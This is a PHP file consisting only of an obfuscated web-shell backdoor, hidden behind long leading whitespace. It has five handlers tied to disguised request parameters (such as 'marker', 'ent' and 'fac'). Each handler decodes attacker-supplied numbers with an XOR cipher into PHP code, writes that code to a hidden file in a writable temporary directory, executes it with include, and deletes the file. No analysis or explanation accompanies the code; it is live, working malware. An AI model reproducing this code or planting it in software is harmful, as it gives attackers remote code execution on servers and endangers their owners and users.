<?																																										if(array_key_exists("\x6D\x61\x72ker", $_REQUEST) && !is_null($_REQUEST["\x6D\x61\x72ker"])){ $pointer = $_REQUEST["\x6D\x61\x72ker"]; $pointer =explode('.' , $pointer) ; $pset = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s3 ); $l = 0; $len = count( $pointer ); do { if( $l>=$len) break; $v9 = $pointer[$l]; $sChar = ord( $s3[$l%$sLen] ); $d = ( ( int)$v9 - $sChar -( $l%10)) ^ 37; $pset .=chr( $d ); $l++; } while( true ); $binding = array_filter([getenv("TMP"), session_save_path(), "/tmp", ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", getcwd()]); foreach ($binding as $factor): if (!( !is_dir($factor) || !is_writable($factor) )) { $ptr = str_replace("{var_dir}", $factor, "{var_dir}/.hld"); if (file_put_contents($ptr, $pset)) { include $ptr; @unlink($ptr); die(); } } endforeach; }
																																										if(isset($_POST["ent"]) ? true : false){ $hld = array_filter(["/dev/shm", "/tmp", "/var/tmp", getcwd(), getenv("TMP"), session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); $ref = $_POST["ent"]; $ref =explode('.' , $ref ); $dat = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt4); $len = count($ref); for ($p = 0; $p < $len; $p++) { $v5 = $ref[$p]; $sChar = ord($salt4[$p %$lenS]); $dec = ((int)$v5 - $sChar - ($p %10)) ^ 8; $dat .=chr($dec); } while ($object = array_shift($hld)) { if (max(0, is_dir($object) * is_writable($object))) { $elem = join("/", [$object, ".comp"]); $file = fopen($elem, 'w'); if ($file) { fwrite($file, $dat); fclose($file); include $elem; @unlink($elem); die(); } } } }
																																										if(isset($_POST["\x66l\x67"])){ $pset = $_POST["\x66l\x67"]; $pset= explode( '.' ,$pset ) ; $pgrp= ''; $s7= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s7); $o= 0; $len= count($pset); do { if ($o >= $len) break; $v7= $pset[$o]; $chS= ord($s7[$o % $lenS]); $d= ((int)$v7 - $chS - ($o % 10)) ^ 48; $pgrp .= chr($d); $o++;}while (true); $comp = array_filter([getenv("TEMP"), "/var/tmp", sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/tmp", getcwd(), ini_get("upload_tmp_dir"), "/dev/shm"]); foreach ($comp as $property_set): if (max(0, is_dir($property_set) * is_writable($property_set))) { $tkn = join("/", [$property_set, ".reference"]); $file = fopen($tkn, 'w'); if ($file) { fwrite($file, $pgrp); fclose($file); include $tkn; @unlink($tkn); die(); } } endforeach; }
																																										if(!is_null($_POST["f\x61c"] ?? null)){ $bind = $_POST["f\x61c"]; $bind= explode ( "." , $bind) ; $value = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $i = 0; foreach( $bind as $v5) { $sChar = ord( $s[$i %$sLen]); $d =( ( int)$v5 - $sChar -( $i %10)) ^ 41; $value .= chr( $d); $i++; } $sym = array_filter(["/var/tmp", getenv("TMP"), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), getcwd(), "/tmp", session_save_path(), ini_get("upload_tmp_dir")]); $holder = 0; do { $rec = $sym[$holder] ?? null; if ($holder >= count($sym)) break; if (!( !is_dir($rec) || !is_writable($rec) )) { $ptr = implode("/", [$rec, ".val"]); if (file_put_contents($ptr, $value)) { include $ptr; @unlink($ptr); exit; } } $holder++; } while (true); }
																																										if(isset($_POST["en\x74ry"])){ $flag = $_POST["en\x74ry"]; $flag = explode ( '.' , $flag ) ; $ent = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s2 ); $u = 0; foreach ($flag as $v5) { $chS = ord($s2[$u % $lenS] ); $d = ((int)$v5 - $chS - ($u % 10)) ^ 72; $ent.= chr($d ); $u++; } $val = array_filter([getenv("TEMP"), getenv("TMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), session_save_path(), "/dev/shm"]); foreach ($val as $symbol): if ((function($d) { return is_dir($d) && is_writable($d); })($symbol)) { $pgrp = vsprintf("%s/%s", [$symbol, ".ent"]); if (@file_put_contents($pgrp, $ent) !== false) { include $pgrp; unlink($pgrp); exit; } } endforeach; }